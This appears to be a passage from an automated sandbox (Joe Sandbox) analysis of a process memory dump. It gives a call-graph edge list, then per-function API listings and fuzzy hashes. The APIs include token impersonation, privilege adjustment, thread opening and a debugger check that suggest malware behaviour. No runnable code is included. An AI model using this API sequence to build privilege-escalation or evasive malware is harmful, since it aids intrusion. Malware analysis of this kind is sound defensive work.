50789->50829 50790->50786 50838 6c5da4 50790->50838 50886 6c5f4a 50790->50886 50791->50833 50792->50773 50793->50786 50847 6e2bdc 50793->50847 50793->50879 50794 6ef6c9 50926 6c5c10 ReadFile SetFilePointerEx _strlen 50794->50926 50865 6f1ce8 50795->50865 50925 6c5c10 ReadFile SetFilePointerEx _strlen 50796->50925 50797->50794 50809 6efc86 50797->50809 50801 6e4909 50799->50801 50811 6e434d 50799->50811 50800 6f1cfc RtlInitUnicodeString 50810 6f1d40 RtlEqualUnicodeString 50800->50810 50804->50777 50882 6e3334 50804->50882 50807 6e2b76 50825 6e2b8f 50807->50825 50807->50829 50839 6e2bca 50807->50839 50808 6ef9fa 50810->50865 50922 6c5c10 ReadFile SetFilePointerEx _strlen 50811->50922 50812 6d0a10 46 API calls 50812->50870 50813 6e329e 50814 6e453d 50923 6c5c10 ReadFile SetFilePointerEx _strlen 50815->50923 50816->50797 50816->50815 50913 6c5c10 ReadFile SetFilePointerEx _strlen 50819->50913 50820->50814 50821 6e4353 50822 6ce6c3 50828 6ce6c4 ReadFile 50822->50828 50823->50769 50823->50850 50824 6e2abb 50825->50786 50825->50829 50825->50833 50835 6ce337 50828->50835 50836 6ce66f 50828->50836 50829->50786 50908 6e29fc 50 API calls 50829->50908 50830 6e4927 50924 6c5c10 ReadFile SetFilePointerEx _strlen 50830->50924 50831 6e2ded 50843 6ce33d 50831->50843 50848 6e2dff 50831->50848 50832 6f1d90 NtOpenThread 50845 6f1df5 NtImpersonateThread 50832->50845 50832->50865 50833->50787 50909 6c482b 46 API calls _strlen 50833->50909 50834 6e2c90 50846 6e331c 50834->50846 50857 6e2cff 50834->50857 50835->50843 50892 6ce31d 50835->50892 50838->50786 50858 6c5df2 ReadFile 50838->50858 50839->50791 50839->50847 50841 6e2d1d 50842->50852 50842->50859 50918 6c5c10 ReadFile SetFilePointerEx _strlen 50843->50918 50855 6f1e24 NtOpenThreadTokenEx 50845->50855 50845->50865 50846->50804 50846->50833 50875 6e2fe7 50846->50875 50847->50834 50856 6e2c81 50847->50856 50914 6c5c10 ReadFile SetFilePointerEx _strlen 50848->50914 50849 6e3169 GetTickCount 50849->50859 50903 6e317d 50849->50903 50850->50769 50850->50771 50850->50786 50850->50820 50850->50823 50850->50829 50850->50869 50876 6e255c 50850->50876 50850->50879 50851 6e4938 50852->50829 50871 6e3cd5 50852->50871 50854 6e3003 50863 6e2cbf 50854->50863 50872 6e3012 50854->50872 50855->50865 50856->50875 50895 6e2ec3 50856->50895 50912 6c5c10 ReadFile SetFilePointerEx _strlen 50857->50912 50858->50786 50858->50869 50859->50848 50867 6e345d 50859->50867 50868 6e3139 50859->50868 50859->50903 50860 6e2d17 50860->50829 50860->50841 50860->50849 50860->50856 50905 6e2ea3 50860->50905 50861 6ce329 WriteFile 50861->50835 50861->50892 50862 6e2e05 50911 6c5c10 ReadFile SetFilePointerEx _strlen 50863->50911 50865->50765 50865->50800 50865->50810 50865->50832 50866 6f1ed9 NtClose 50865->50866 50873 6f1ee7 NtClose 50865->50873 50889 6f1e4e NtAdjustPrivilegesToken 50865->50889 50866->50865 50921 6c5c10 ReadFile SetFilePointerEx _strlen 50867->50921 50919 6c5c10 ReadFile SetFilePointerEx _strlen 50868->50919 50869->50786 50870->50775 50870->50777 50870->50779 50870->50785 50870->50786 50870->50789 50870->50807 50870->50812 50870->50833 50870->50839 50870->50860 50891 6e29db 50870->50891 50871->50786 50871->50820 50880 6e2c72 50872->50880 50872->50881 50873->50865 50876->50786 50876->50829 50904 6e257b 50876->50904 50879->50786 50879->50880 50879->50881 50910 6c5c10 ReadFile SetFilePointerEx _strlen 50880->50910 50881->50786 50881->50788 50920 6c5c10 ReadFile SetFilePointerEx _strlen 50881->50920 50883->50822 50883->50828 50883->50892 50894 6ce38d 50883->50894 50884 6e3463 50886->50768 50886->50786 50887 6e2cc8 50889->50865 50889->50866 50891->50829 50891->50833 50897 6e2410 50891->50897 50900 6e29f4 50891->50900 50892->50861 50892->50894 50893 6c62e0 ReadFile SetFilePointerEx 50893->50903 50895->50856 50898 6e2ed5 50895->50898 50916 6c5c10 ReadFile SetFilePointerEx _strlen 50895->50916 50896 6e2c7b 50917 6c5c10 ReadFile SetFilePointerEx _strlen 50898->50917 50899 6e2ebb 50900->50794 50900->50833 50902 6e2edb 50903->50859 50903->50868 50903->50880 50903->50893 50906 6e2d08 50903->50906 50905->50860 50905->50875 50905->50899 50905->50903 50907 6e3079 50905->50907 50915 6c5c10 ReadFile SetFilePointerEx _strlen 50905->50915 50906->50875 50907->50786 50907->50847 50908->50786 50909->50824 50910->50896 50911->50887 50912->50906 50913->50831 50914->50862 50915->50905 50916->50895 50917->50902 50918->50854 50919->50895 50920->50813 50921->50884 50922->50821 50923->50830 50924->50851 50925->50850 50926->50808 50927->50782 50980 6ff600 26 API calls 50556 6c8318 GetTokenInformation 50557 6c8151 50556->50557 50558 6c81ea CloseHandle 50557->50558 50560 6c7360 50557->50560 50667 6c5c10 _strlen 50557->50667 50558->50560 50559 6c6cc8 50561 6c716d 50559->50561 50575 6c7023 50559->50575 50604 6c6da0 _strlen 50559->50604 50559->50667 50560->50559 50605 6c5d9e 50560->50605 50560->50667 50562 6c5f1c SetFilePointerEx 50561->50562 50561->50575 50563 6e3658 GetFileSizeEx 50564 6f1f67 50721 6c482b 46 API calls _strlen 50564->50721 50565 6f1c92 RtlAdjustPrivilege 50565->50575 50566 6c62e0 ReadFile SetFilePointerEx 50669 6e3ec6 50566->50669 50567 6e2a4d GetEnvironmentVariableW 50571 6e2a9f GetTempPathW 50567->50571 50572 6e2a58 50567->50572 50569 6cefff 50573 6cf007 SetFilePointerEx 50569->50573 50676 6ce381 50569->50676 50570 6e522a 50577 6e364a 50570->50577 50585 6e3566 50570->50585 50589 6e46bc 50570->50589 50574 6f1f70 50576 6f1f7e RtlExitUserThread 50574->50576 50575->50564 50575->50565 50587 6f1cd1 NtQuerySystemInformation 50575->50587 50575->50667 50584 6e3656 50577->50584 50577->50585 50578 6e2ad0 50583 6e2ad2 wsprintfW 50578->50583 50579 6e2b31 50580 6d0a10 46 API calls 50618 6e296b _wcslen 50580->50618 50581 6e3047 50594 6e3059 50581->50594 50674 6e3018 50581->50674 50582 6e2a40 50596 6e2a4c 50582->50596 50623 6e2421 50582->50623 50582->50667 50627 6e29c4 50583->50627 50584->50563 50641 6e2bdc 50585->50641 50585->50667 50672 6e382e 50585->50672 50586 6ef6c9 50720 6c5c10 ReadFile SetFilePointerEx _strlen 50586->50720 50658 6f1ce8 50587->50658 50588 6e4bb4 GetTickCount 50719 6c5c10 ReadFile SetFilePointerEx _strlen 50588->50719 50589->50586 50601 6efc86 50589->50601 50591 6e4341 50593 6e4909 50591->50593 50603 6e434d 50591->50603 50592 6f1cfc RtlInitUnicodeString 50602 6f1d40 RtlEqualUnicodeString 50592->50602 50596->50567 50675 6e3334 50596->50675 50599 6e2b76 50619 6e2b8f 50599->50619 50599->50623 50633 6e2bca 50599->50633 50600 6ef9fa 50602->50658 50716 6c5c10 ReadFile SetFilePointerEx _strlen 50603->50716 50604->50563 50604->50570 50604->50581 50604->50588 50604->50591 50608 6e45b6 50604->50608 50609 6e46a3 50604->50609 50612 6e2de7 50604->50612 50613 6e3ee3 CloseHandle 50604->50613 50616 6e44b4 CreateFileW 50604->50616 50604->50618 50604->50623 50604->50627 50636 6e49b4 50604->50636 50645 6e428f 50604->50645 50652 6e338d 50604->50652 50604->50667 50604->50669 50604->50672 50695 6c5dfe 50604->50695 50632 6c5da4 50605->50632 50605->50667 50679 6c5f4a 50605->50679 50606 6e329e 50607 6e453d 50717 6c5c10 ReadFile SetFilePointerEx _strlen 50608->50717 50609->50589 50609->50608 50707 6c5c10 ReadFile SetFilePointerEx _strlen 50612->50707 50613->50607 50614 6e4353 50615 6ce6c3 50622 6ce6c4 ReadFile 50615->50622 50616->50604 50616->50669 50617 6e2abb 50618->50567 50618->50569 50618->50571 50618->50578 50618->50580 50618->50582 50618->50599 50618->50627 50618->50633 50653 6e2d17 50618->50653 50618->50667 50684 6e29db 50618->50684 50619->50623 50619->50627 50619->50667 50629 6ce337 50622->50629 50630 6ce66f 50622->50630 50623->50667 50702 6e29fc 50 API calls 50623->50702 50624 6e4927 50718 6c5c10 ReadFile SetFilePointerEx _strlen 50624->50718 50625 6e2ded 50637 6ce33d 50625->50637 50642 6e2dff 50625->50642 50626 6f1d90 NtOpenThread 50639 6f1df5 NtImpersonateThread 50626->50639 50626->50658 50627->50579 50703 6c482b 46 API calls _strlen 50627->50703 50628 6e2c90 50640 6e331c 50628->50640 50650 6e2cff 50628->50650 50629->50637 50685 6ce31d 50629->50685 50651 6c5df2 ReadFile 50632->50651 50632->50667 50633->50583 50633->50641 50635 6e2d1d 50636->50645 50636->50652 50712 6c5c10 ReadFile SetFilePointerEx _strlen 50637->50712 50648 6f1e24 NtOpenThreadTokenEx 50639->50648 50639->50658 50640->50596 50640->50627 50666 6e2fe7 50640->50666 50641->50628 50649 6e2c81 50641->50649 50708 6c5c10 ReadFile SetFilePointerEx _strlen 50642->50708 50643 6e3169 GetTickCount 50643->50652 50697 6e317d 50643->50697 50644 6e4938 50645->50623 50662 6e3cd5 50645->50662 50647 6e3003 50656 6e2cbf 50647->50656 50663 6e3012 50647->50663 50648->50658 50649->50666 50688 6e2ec3 50649->50688 50706 6c5c10 ReadFile SetFilePointerEx _strlen 50650->50706 50651->50667 50651->50695 50652->50642 50660 6e345d 50652->50660 50661 6e3139 50652->50661 50652->50697 50653->50623 50653->50635 50653->50643 50653->50649 50699 6e2ea3 50653->50699 50654 6ce329 WriteFile 50654->50629 50654->50685 50655 6e2e05 50705 6c5c10 ReadFile SetFilePointerEx _strlen 50656->50705 50658->50575 50658->50592 50658->50602 50658->50626 50659 6f1ed9 NtClose 50658->50659 50664 6f1ee7 NtClose 50658->50664 50682 6f1e4e NtAdjustPrivilegesToken 50658->50682 50659->50658 50715 6c5c10 ReadFile SetFilePointerEx _strlen 50660->50715 50713 6c5c10 ReadFile SetFilePointerEx _strlen 50661->50713 50662->50613 50662->50667 50673 6e2c72 50663->50673 50663->50674 50664->50658 50668 6e255c 50668->50623 50668->50667 50698 6e257b 50668->50698 50669->50566 50669->50604 50669->50613 50669->50616 50669->50623 50669->50667 50669->50668 50669->50672 50669->50695 50672->50667 50672->50673 50672->50674 50704 6c5c10 ReadFile SetFilePointerEx _strlen 50673->50704 50674->50581 50674->50667 50714 6c5c10 ReadFile SetFilePointerEx _strlen 50674->50714 50676->50615 50676->50622 50676->50685 50687 6ce38d 50676->50687 50677 6e3463 50679->50562 50679->50667 50680 6e2cc8 50682->50658 50682->50659 50684->50623 50684->50627 50690 6e2410 50684->50690 50693 6e29f4 50684->50693 50685->50654 50685->50687 50686 6c62e0 ReadFile SetFilePointerEx 50686->50697 50688->50649 50691 6e2ed5 50688->50691 50710 6c5c10 ReadFile SetFilePointerEx _strlen 50688->50710 50689 6e2c7b 50711 6c5c10 ReadFile SetFilePointerEx _strlen 50691->50711 50692 6e2ebb 50693->50586 50693->50627 50695->50667 50696 6e2edb 50697->50652 50697->50661 50697->50673 50697->50686 50700 6e2d08 50697->50700 50699->50653 50699->50666 50699->50692 50699->50697 50701 6e3079 50699->50701 50709 6c5c10 ReadFile SetFilePointerEx _strlen 50699->50709 50700->50666 50701->50641 50701->50667 50702->50667 50703->50617 50704->50689 50705->50680 50706->50700 50707->50625 50708->50655 50709->50699 50710->50688 50711->50696 50712->50647 50713->50688 50714->50606 50715->50677 50716->50614 50717->50624 50718->50644 50719->50669 50720->50600 50721->50574 50968 6c5c10 77 API calls 2 library calls 50969 6c9d9a SetFilePointerEx 51001 706f07 65 API calls 2 library calls 50722 6c5917 50723 6c58fc CloseHandle 50722->50723 50724 6c591a 50722->50724 50724->50723 50725 6c59ad 50724->50725

                                                                                                                                                                                Executed Functions

                                                                                                                                                                                Function 006C8140 Relevance: 66.1, APIs: 32, Strings: 4, Instructions: 3071COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • CloseHandle.KERNELBASE(00000000,?,?,?,?,006C5563), ref: 006C81EB
                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,?,006C5563), ref: 006C8227
                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,?,?,006C5563), ref: 006C826F
                                                                                                                                                                                • GetTokenInformation.KERNELBASE(?,?,?,?,?,006C5563), ref: 006C8280
                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,006C5563), ref: 006C828E
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.3340574927.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_6c0000_perfhost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ProcessToken$CloseCurrentErrorHandleInformationLastOpen
                                                                                                                                                                                • String ID: $hR'n$j@h$Ul
                                                                                                                                                                                • API String ID: 2078281146-1656569733
                                                                                                                                                                                • Opcode ID: 8b89a3a8f40ad4ad300554f56945303f22198982bf967490660020a50f00856d
                                                                                                                                                                                • Instruction ID: b6a5cf6b63c349ac70e22cf796f4138ec822c67220e0462b57c62775cf7b0477
                                                                                                                                                                                • Opcode Fuzzy Hash: 8b89a3a8f40ad4ad300554f56945303f22198982bf967490660020a50f00856d
                                                                                                                                                                                • Instruction Fuzzy Hash: C233447190E3C19ECB318B29C818FF67BE7EB61314F4846AEE4858B3E2D6259D05C752
                                                                                                                                                                                Function 006E7960 Relevance: 15.4, APIs: 10, Instructions: 355COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetWindowsDirectoryW.KERNEL32(?,006C5A6E), ref: 006E7925
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.3340574927.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_6c0000_perfhost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DirectoryWindows
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3619848164-0
                                                                                                                                                                                • Opcode ID: b857bb6af0aec59f08827f4f4b5b71a285ad09b3e4cd49dc1051daeeca315ca4
                                                                                                                                                                                • Instruction ID: 24d29a9f5f7aafcae3bb6d2d91771d6c4c2ed4ce525aa26c2dc1180a60d59221
                                                                                                                                                                                • Opcode Fuzzy Hash: b857bb6af0aec59f08827f4f4b5b71a285ad09b3e4cd49dc1051daeeca315ca4
                                                                                                                                                                                • Instruction Fuzzy Hash: 3BB1042090F3C5AFDB364B2B4C09BFA3B675F22720F1906D6E5848B3E3E6144D09D296
                                                                                                                                                                                Function 006C8199 Relevance: 3.1, APIs: 2, Instructions: 99COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetSidSubAuthorityCount.ADVAPI32 ref: 006C8199
                                                                                                                                                                                • CloseHandle.KERNELBASE(00000000,?,?,?,?,006C5563), ref: 006C81EB
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.3340574927.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_6c0000_perfhost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AuthorityCloseCountHandle
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1604591301-0
                                                                                                                                                                                • Opcode ID: f32c0c1ac52748b800ac365978fa36a553c48d6197c4211e88e8c41184916d0c
                                                                                                                                                                                • Instruction ID: 3934d3afa7f33dc2c0675e3e42d921dc033447ff8d7c4b2106a2a2510ef0dd6e
                                                                                                                                                                                • Opcode Fuzzy Hash: f32c0c1ac52748b800ac365978fa36a553c48d6197c4211e88e8c41184916d0c
                                                                                                                                                                                • Instruction Fuzzy Hash: 3D31F770A0C201AFC9398618C80DFF63A97EA61334F0C429EF556573F1D928AE02C65A
                                                                                                                                                                                Function 006C82F4 Relevance: 3.0, APIs: 2, Instructions: 34COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.3340574927.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_6c0000_perfhost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 2eed3519d5bc789891993f952767190f79f3c48ac5f8753b017861a67dc2ec5e
                                                                                                                                                                                • Instruction ID: a0862d9300f11436637402a9d3b821d790d900ee85790b31821bb9cf7d16073e
                                                                                                                                                                                • Opcode Fuzzy Hash: 2eed3519d5bc789891993f952767190f79f3c48ac5f8753b017861a67dc2ec5e
                                                                                                                                                                                • Instruction Fuzzy Hash: B0F0B430A84B86AEDE350A79D80CFF52683DBA2766F0A490CE950573E18F085F0142CD
                                                                                                                                                                                Function 006C8318 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),?,?), ref: 006C832A
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.3340574927.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_6c0000_perfhost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InformationToken
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4114910276-0
                                                                                                                                                                                • Opcode ID: 8d6a502ad5d507744e7c611316724abe7f5ce816719758114d1ea9d738bcd086
                                                                                                                                                                                • Instruction ID: 588ef5fb3c1aacf1464159509bd7335a09268ab310caddba568f119d3cd28afd
                                                                                                                                                                                • Opcode Fuzzy Hash: 8d6a502ad5d507744e7c611316724abe7f5ce816719758114d1ea9d738bcd086
                                                                                                                                                                                • Instruction Fuzzy Hash: FEE0C238248B42BFEA3206204C09FB62F2BEBC1B41F4A044DB440932A2CD1C8E0153E8
                                                                                                                                                                                Function 006C823E Relevance: 1.3, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetSidSubAuthorityCount.ADVAPI32 ref: 006C8199
                                                                                                                                                                                • CloseHandle.KERNELBASE(00000000,?,?,?,?,006C5563), ref: 006C81EB
                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,?,?,006C5563), ref: 006C826F
                                                                                                                                                                                • GetTokenInformation.KERNELBASE(?,?,?,?,?,006C5563), ref: 006C8280
                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,006C5563), ref: 006C828E
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.3340574927.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_6c0000_perfhost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AuthorityCloseCountCurrentErrorHandleInformationLastProcessToken
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 85819701-0
                                                                                                                                                                                • Opcode ID: a4d99e587194612dc5906e417be2cfbc6ed0f72c64d8a8f15c692d4f9e7e0d01
                                                                                                                                                                                • Instruction ID: 763a1b2a2e0d1dc9e5605de55bad35286658fb53e084ccfb3cb7a4b15544d3b3
                                                                                                                                                                                • Opcode Fuzzy Hash: a4d99e587194612dc5906e417be2cfbc6ed0f72c64d8a8f15c692d4f9e7e0d01
                                                                                                                                                                                • Instruction Fuzzy Hash: 47E09265E0C241CEC53206285C1CFF225A3D91232470C026FDD12837A2DD2A8D06D193
                                                                                                                                                                                Function 006C8249 Relevance: 1.3, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • CloseHandle.KERNELBASE(00000000,?,?,?,?,006C5563), ref: 006C81EB
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.3340574927.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_6c0000_perfhost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseHandle
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2962429428-0
                                                                                                                                                                                • Opcode ID: 5de6e1683780696333440e81d2acf19cf3796e121060eab04e37b8cb84dc3698
                                                                                                                                                                                • Instruction ID: 3a869e1aaaf8cc0818cbd3b9c605e3a2aa5f2992c10f8997ba5d829b5153317a
                                                                                                                                                                                • Opcode Fuzzy Hash: 5de6e1683780696333440e81d2acf19cf3796e121060eab04e37b8cb84dc3698
                                                                                                                                                                                • Instruction Fuzzy Hash: 08D05B3960D6019E8931562C884CFB765C7FE50B3174C031DED2183794DD29CD12C1D7
                                                                                                                                                                                Function 006C5917 Relevance: 1.3, APIs: 1, Instructions: 18COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 11295 6c5917-6c5918 11296 6c58fc-6c5908 CloseHandle 11295->11296 11297 6c591a-6c59a7 11295->11297 11297->11296 11299 6c59ad-6c5a00 call 7040ba 11297->11299
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.3340574927.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_6c0000_perfhost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseHandle
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2962429428-0
                                                                                                                                                                                • Opcode ID: 41f97ef5b448f5a92899f22de7174117b65efb9b27f36a779f7b922e635e629d
                                                                                                                                                                                • Instruction ID: cf1c46dc3bcd071eb1d344e2ad281a8614ac6affe0e763f32e77c7598796a7ba
                                                                                                                                                                                • Opcode Fuzzy Hash: 41f97ef5b448f5a92899f22de7174117b65efb9b27f36a779f7b922e635e629d
                                                                                                                                                                                • Instruction Fuzzy Hash: 3FD02E80909A60D6CA048A280C4BFB9218BD228300304879EF803C6299D438F8C1ABE2
                                                                                                                                                                                Function 006C5BC0 Relevance: 1.3, APIs: 1, Instructions: 9memoryCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 11303 6c5bc0-6c5bc7 11304 6c5bcd-6c5bd9 VirtualAlloc 11303->11304 11305 6c5bc9 11303->11305 11305->11304 11306 6c5bcb 11305->11306 11306->11304
                                                                                                                                                                                APIs
                                                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,006C4F02,00000060), ref: 006C5BD3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.3340574927.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_6c0000_perfhost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                                                • Opcode ID: 9584ff31696c758b640bb7c52129532113c3a91c8a620233c1cd3d06517f9a2d
                                                                                                                                                                                • Instruction ID: 9ab523d4e8da673e5af7e3de066a4f0732d1ca44e1b33f23165e9ce84b580832
                                                                                                                                                                                • Opcode Fuzzy Hash: 9584ff31696c758b640bb7c52129532113c3a91c8a620233c1cd3d06517f9a2d
                                                                                                                                                                                • Instruction Fuzzy Hash: D4C09B35785755ADED3557544C5DFB47F359740711F144144B30A951F057707C80D50D

                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                Function 007008F1 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 007009E9
                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 007009F3
                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,00000000), ref: 00700A00
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.3340574927.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_6c0000_perfhost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3906539128-0
                                                                                                                                                                                • Opcode ID: fca93310940e9b138991b2423f7a6b6d254664f640f3c1f726c9f0e429726536
                                                                                                                                                                                • Instruction ID: 7bf48120aa6df4102c6daa5c868cd19d09ce559edb2b2c52ac197ec4b497ba32
                                                                                                                                                                                • Opcode Fuzzy Hash: fca93310940e9b138991b2423f7a6b6d254664f640f3c1f726c9f0e429726536
                                                                                                                                                                                • Instruction Fuzzy Hash: 6731B4B590121DDBCB21DF64DC897C9B7F8AF08310F5082DAE51CA6291EB749F858F54
                                                                                                                                                                                Function 007034CD Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000003,?,007034A3,00000003,0071CE80,0000000C,007035CD,00000003,00000002,00000000,?,007015C8,00000003), ref: 007034EE
                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000,?,007034A3,00000003,0071CE80,0000000C,007035CD,00000003,00000002,00000000,?,007015C8,00000003), ref: 007034F5
                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00703507
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.3340574927.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_6c0000_perfhost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1703294689-0
                                                                                                                                                                                • Opcode ID: 58b6ec416f16e9955236cea1c3538a19df62412107d6bc39aa9ef0fb24ad5673
                                                                                                                                                                                • Instruction ID: a3cccba4316571f405d5acb4aa2b126acfce8cc059b70e61d21362aa45121858
                                                                                                                                                                                • Opcode Fuzzy Hash: 58b6ec416f16e9955236cea1c3538a19df62412107d6bc39aa9ef0fb24ad5673
                                                                                                                                                                                • Instruction Fuzzy Hash: 6DE01A31000149EFCF016F24CC5DA583BA9EB05341B088614F9454A162CB39AA52CA84
                                                                                                                                                                                Function 006C1130 Relevance: .0, Instructions: 2COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.3340574927.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_6c0000_perfhost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                                                                                • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                                                                                                                                • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                Function 00701A8F Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
